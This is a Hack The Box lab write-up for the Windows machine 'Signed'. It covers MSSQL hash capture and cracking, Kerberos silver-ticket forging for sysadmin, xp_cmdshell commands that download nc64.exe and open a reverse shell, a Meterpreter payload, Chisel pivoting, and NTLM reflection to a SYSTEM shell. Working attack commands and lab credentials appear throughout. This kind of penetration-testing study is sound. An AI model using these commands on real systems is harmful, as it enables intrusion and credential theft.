Hack The Box / WINDOWS / 2026-03-18
Hack The Box — Signed (Windows)
MSSQL pivot from low-priv credentials, NTLM hash capture/cracking, Kerberos ticket forging for SQL privilege escalation, and NTLM reflection to WinRMS SYSTEM.
Target
- IP:
10.10.11.90
Machine information
As is common in real-life Windows penetration tests, you start the Signed box with credentials for the following account, which can be used to access the MSSQL service:
scott / Sm230#C5NatH
Recon
sudo nmap -sC -sV 10.10.11.90 -p- -v
PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.90:1433:
| Target_Name: SIGNED
| NetBIOS_Domain_Name: SIGNED
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: SIGNED.HTB
| DNS_Computer_Name: DC01.SIGNED.HTB
| DNS_Tree_Name: SIGNED.HTB
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.10.11.90:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-11T19:57:25
| Not valid after: 2055-10-11T19:57:25
| MD5: 743d:e6f0:cc82:0829:4271:9253:df97:077d
|_SHA-1: 2681:3ca6:371c:544e:1b47:89b6:dc01:45c5:fb92:575c
|_ssl-date: 2025-10-11T21:21:21+00:00; +4h57m38s from scanner time.
Add dc01.signed.htb to /etc/hosts.
Initial MSSQL access (scott)
mssqlclient.py -port 1433 'SIGNED'/'scott':'Sm230#C5NatH'@dc01.signed.htb
We get a shell.
SELECT @@version
Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
Oct 8 2022 05:58:25
Copyright (C) 2022 Microsoft Corporation
Enterprise Evaluation Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
entity_name subentity_name permission_name
----------- -------------- -----------------
server CONNECT SQL
server VIEW ANY DATABASE
Capture MSSQL service hash with Responder
On the attacker machine, start Responder:
sudo responder -I tun0
In the SQL shell:
EXEC master.sys.xp_dirtree '\\10.10.14.159\myshare',1, 1
On the Responder terminal we get:
[SMB] NTLMv2-SSP Client : 10.10.11.90
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::SIGNED:1e4c40cdf91cac15:436063E0E848FEF7116F15BA55BACAD2:010100000000000000741596CC3ADC01060AD22E5B2984250000000002000800560050003500350001001E00570049004E002D0047004100550045004A00590051004A0036004700510004003400570049004E002D0047004100550045004A00590051004A003600470051002E0056005000350035002E004C004F00430041004C000300140056005000350035002E004C004F00430041004C000500140056005000350035002E004C004F00430041004C000700080000741596CC3ADC0106000400020000000800300030000000000000000000000000300000549B76A9D006CFA5CDFE6D4E25F407828BB6ACAA3484BF3711FA343830A61E5E0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100350039000000000000000000
Put the hash into a file hash and crack it:
hashcat -a 0 ./hash /usr/share/wordlists/rockyou.txt
We get password:
purPLE9795!@
MSSQL access as mssqlsvc
mssqlclient.py -port 1433 -windows-auth 'SIGNED'/'mssqlsvc':'purPLE9795!@'@dc01.signed.htb
We get a shell.
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
entity_name subentity_name permission_name
----------- -------------- -------------------------------
server CONNECT SQL
server VIEW ANY DATABASE
server VIEW ANY SECURITY DEFINITION
server VIEW ANY PERFORMANCE DEFINITION
server VIEW ANY DEFINITION
Enumerate users with NetExec
nxc mssql dc01.signed.htb -u 'mssqlsvc' -p 'purPLE9795!@' --rid-brute
MSSQL 10.10.11.90 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)
MSSQL 10.10.11.90 1433 DC01 [+] SIGNED.HTB\mssqlsvc:purPLE9795!@
MSSQL 10.10.11.90 1433 DC01 498: SIGNED\Enterprise Read-only Domain Controllers
MSSQL 10.10.11.90 1433 DC01 500: SIGNED\Administrator
MSSQL 10.10.11.90 1433 DC01 501: SIGNED\Guest
MSSQL 10.10.11.90 1433 DC01 502: SIGNED\krbtgt
MSSQL 10.10.11.90 1433 DC01 512: SIGNED\Domain Admins
MSSQL 10.10.11.90 1433 DC01 513: SIGNED\Domain Users
MSSQL 10.10.11.90 1433 DC01 514: SIGNED\Domain Guests
MSSQL 10.10.11.90 1433 DC01 515: SIGNED\Domain Computers
MSSQL 10.10.11.90 1433 DC01 516: SIGNED\Domain Controllers
MSSQL 10.10.11.90 1433 DC01 517: SIGNED\Cert Publishers
MSSQL 10.10.11.90 1433 DC01 518: SIGNED\Schema Admins
MSSQL 10.10.11.90 1433 DC01 519: SIGNED\Enterprise Admins
MSSQL 10.10.11.90 1433 DC01 520: SIGNED\Group Policy Creator Owners
MSSQL 10.10.11.90 1433 DC01 521: SIGNED\Read-only Domain Controllers
MSSQL 10.10.11.90 1433 DC01 522: SIGNED\Cloneable Domain Controllers
MSSQL 10.10.11.90 1433 DC01 525: SIGNED\Protected Users
MSSQL 10.10.11.90 1433 DC01 526: SIGNED\Key Admins
MSSQL 10.10.11.90 1433 DC01 527: SIGNED\Enterprise Key Admins
MSSQL 10.10.11.90 1433 DC01 553: SIGNED\RAS and IAS Servers
MSSQL 10.10.11.90 1433 DC01 571: SIGNED\Allowed RODC Password Replication Group
MSSQL 10.10.11.90 1433 DC01 572: SIGNED\Denied RODC Password Replication Group
MSSQL 10.10.11.90 1433 DC01 1000: SIGNED\DC01$
MSSQL 10.10.11.90 1433 DC01 1101: SIGNED\DnsAdmins
MSSQL 10.10.11.90 1433 DC01 1102: SIGNED\DnsUpdateProxy
MSSQL 10.10.11.90 1433 DC01 1103: SIGNED\mssqlsvc
MSSQL 10.10.11.90 1433 DC01 1104: SIGNED\HR
MSSQL 10.10.11.90 1433 DC01 1105: SIGNED\IT
MSSQL 10.10.11.90 1433 DC01 1106: SIGNED\Finance
MSSQL 10.10.11.90 1433 DC01 1107: SIGNED\Developers
MSSQL 10.10.11.90 1433 DC01 1108: SIGNED\Support
MSSQL 10.10.11.90 1433 DC01 1109: SIGNED\oliver.mills
MSSQL 10.10.11.90 1433 DC01 1110: SIGNED\emma.clark
MSSQL 10.10.11.90 1433 DC01 1111: SIGNED\liam.wright
MSSQL 10.10.11.90 1433 DC01 1112: SIGNED\noah.adams
MSSQL 10.10.11.90 1433 DC01 1113: SIGNED\ava.morris
MSSQL 10.10.11.90 1433 DC01 1114: SIGNED\sophia.turner
MSSQL 10.10.11.90 1433 DC01 1115: SIGNED\james.morgan
MSSQL 10.10.11.90 1433 DC01 1116: SIGNED\mia.cooper
MSSQL 10.10.11.90 1433 DC01 1117: SIGNED\elijah.brooks
MSSQL 10.10.11.90 1433 DC01 1118: SIGNED\isabella.evans
MSSQL 10.10.11.90 1433 DC01 1119: SIGNED\lucas.murphy
MSSQL 10.10.11.90 1433 DC01 1120: SIGNED\william.johnson
MSSQL 10.10.11.90 1433 DC01 1121: SIGNED\charlotte.price
MSSQL 10.10.11.90 1433 DC01 1122: SIGNED\henry.bennett
MSSQL 10.10.11.90 1433 DC01 1123: SIGNED\amelia.kelly
MSSQL 10.10.11.90 1433 DC01 1124: SIGNED\jackson.gray
MSSQL 10.10.11.90 1433 DC01 1125: SIGNED\harper.diaz
MSSQL 10.10.11.90 1433 DC01 1126: SIGNED\SQLServer2005SQLBrowserUser$DC01
We can put users into a file with:
nxc mssql dc01.signed.htb -u 'mssqlsvc' -p 'purPLE9795!@' --rid-brute | cut -d: -f 2 | cut -d \\ -f2 | tail -n +3 > users.txt
SID extraction and ticket forging context
Useful site:
- https://codeplacer.wordpress.com/2018/08/27/get-sid-from-active-directory-using-ms-sql-server/
SELECT SUSER_SID('SIGNED\mssqlsvc')
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000'
We can convert it with C++ ConvertSidToStringSidA, in Advapi32.lib on Windows:
- https://learn.microsoft.com/en-us/windows/win32/api/sddl/nf-sddl-convertsidtostringsida
- See attached program
convert_sid.cpp
Run it.
We get this string:
S-1-5-21-4088429403-1159899800-2753317549-1103
So the domain SID is:
S-1-5-21-4088429403-1159899800-2753317549
Password purPLE9795!@ converted to NT hash:
ef699384c3285c54128a3ee1ddb1a0cc
Here is information about MSSQL SPNs:
- https://learn.microsoft.com/en-us/sql/relational-databases/native-client/features/service-principal-name-spn-support-in-client-connections?view=sql-server-ver15
Forge Kerberos ticket for MSSQL
ticketer.py -domain signed.htb -domain-sid 'S-1-5-21-4088429403-1159899800-2753317549' -nthash 'ef699384c3285c54128a3ee1ddb1a0cc' -spn 'mssqlsvc/dc01.signed.htb:1433' 'mssqlsvc'
[*] Saving ticket in mssqlsvc.ccache
export KRB5CCNAME='mssqlsvc.ccache'
mssqlclient.py -port 1433 -windows-auth -k -no-pass dc01.signed.htb
SQL (SIGNED\Administrator guest@master)>
We get an MSSQL shell as Administrator.
SELECT is_srvrolemember('sysadmin');
0
We are not sysadmin, so we cannot do much yet.
Check who is sysadmin:
SELECT name,type_desc,is_disabled FROM master.sys.server_principals WHERE IS_SRVROLEMEMBER ('sysadmin',name) = 1 ORDER BY name
name type_desc is_disabled
------------------------- ------------- -----------
NT SERVICE\MSSQLSERVER WINDOWS_LOGIN 0
NT SERVICE\SQLSERVERAGENT WINDOWS_LOGIN 0
NT SERVICE\SQLWriter WINDOWS_LOGIN 0
NT SERVICE\Winmgmt WINDOWS_LOGIN 0
sa SQL_LOGIN 0
SIGNED\IT WINDOWS_GROUP 0
The IT group is sysadmin. With ticketer option -groups we can specify a group ID.
ticketer.py -domain signed.htb -domain-sid 'S-1-5-21-4088429403-1159899800-2753317549' -nthash 'ef699384c3285c54128a3ee1ddb1a0cc' -spn 'mssqlsvc/dc01.signed.htb:1433' -groups 1105 'mssqlsvc'
[*] Saving ticket in mssqlsvc.ccache
mssqlclient.py -port 1433 -windows-auth -k -no-pass dc01.signed.htb
SQL (SIGNED\Administrator dbo@master)>
Now we have a shell as dbo in the database.
SELECT is_srvrolemember('sysadmin');
1
Command execution and reverse shell from MSSQL
Now we can try to get a reverse shell.
Start listener and HTTP server:
rlwrap nc -vlnp 4444
python3 -m http.server 5555
Upload nc64.exe (https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe) to the victim machine and execute it:
enable_xp_cmdshell
xp_cmdshell mkdir C:\tmp
xp_cmdshell curl http://10.10.14.18:5555/nc64.exe -o C:\tmp\nc64.exe
xp_cmdshell C:\tmp\nc64.exe -e cmd.exe 10.10.14.18 4444
We get a reverse shell.
whoami
signed\mssqlsvc
Meterpreter shell
Generate payload:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o reverse.exe
Start Metasploit handler:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
run
Upload reverse.exe to the victim and execute it.
We get a reverse Meterpreter shell.
Then we can spawn additional shells with command shell.
Host information
Get Windows version information:
(Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion") | Select-Object -Property *
CurrentBuild : 17763
ProductName : Windows Server 2019 Standard
ReleaseId : 1809
UBR : 7314
BloodHound collection
Download SharpHound.exe (https://github.com/SpecterOps/SharpHound) and upload it to the victim machine.
Run SharpHound on victim:
.\SharpHound.exe
A zip file is created.
To download it to our machine, we can use smbserver:
smbserver.py -smb2support -username test12 -password test12 share $(pwd)
On victim machine run:
net use \\10.10.14.18\share test12 /USER:test12
cp 20251028162738_BloodHound.zip \\10.10.14.18\share\
Start BloodHound:
sudo bloodhound
SOCKS pivot with Chisel
To access various open ports on the victim host, use Chisel in SOCKS proxy mode.
Download Chisel (https://github.com/jpillora/chisel) and upload the Windows version to the victim.
On attacker machine:
./chisel_linux server -p 9999 --reverse
On victim machine:
.\chisel_windows.exe client 10.10.14.18:9999 R:socks
Now edit /etc/proxychains4.conf and add:
socks5 127.0.0.1 1080
Comment out any other lines for other SOCKS proxies.
Now, for example, we can access SMB:
proxychains nxc smb 10.10.11.90 -d signed.htb -u 'mssqlsvc' -p 'purPLE9795!@'
SMB 10.10.11.90 445 DC01 [+] signed.htb\mssqlsvc:purPLE9795!@
LDAP checker:
proxychains nxc ldap 10.10.11.90 -d signed.htb -u 'mssqlsvc' -p 'purPLE9795!@' -M ldap-checker
LDAP 10.10.11.90 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)
LDAP 10.10.11.90 389 DC01 [+] signed.htb\mssqlsvc:purPLE9795!@
LDAP-CHE... 10.10.11.90 389 DC01 LDAP signing NOT enforced
LDAP-CHE... 10.10.11.90 389 DC01 [-] signed.htb - TLS handshake failed; certificate likely not configured
In the shell on the victim machine:
netstat -a -p tcp
We notice:
TCP 0.0.0.0:5986 DC01:0 LISTENING
There is WinRMS.
We can try an NTLM self-reflection attack as explained here:
- https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
NTLM reflection to WinRMS SYSTEM
Download bloodyad:
- https://github.com/CravateRouge/bloodyAD
Add malicious DNS record:
proxychains python3 bloodyAD/bloodyAD.py --host dc01.signed.htb -d signed.htb --dc-ip 10.10.11.90 -u 'mssqlsvc' -p 'purPLE9795!@' add dnsRecord 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' 10.10.14.18
[+] localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA has been successfully added
Start relay:
proxychains ntlmrelayx.py -t winrms://dc01.signed.htb -smb2support --interactive
Trigger coercion:
proxychains coercer coerce -l 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' -t 10.10.11.90 -u 'mssqlsvc' -p 'purPLE9795!@' -d signed.htb -v --always-continue
In ntlmrelayx.py terminal we get:
[*] HTTP server returned error code 500, this is expected, treating as a successful login
[*] (SMB): Authenticating connection from /@10.10.11.90 against winrms://dc01.signed.htb SUCCEED [1]
[*] winrms:///@dc01.signed.htb [1] -> Started interactive WinRMS shell via TCP on 127.0.0.1:11000
Connect:
nc 127.0.0.1 11000
We have a shell.
whoami
nt authority\system
We can read the root flag:
type C:\Users\Administrator\Desktop\root.txt
Interesting notes
View logs of the last 20 scheduled task events
Get-WinEvent -LogName Microsoft-Windows-TaskScheduler/Operational -MaxEvents 20 | Format-List TimeCreated, Id, Message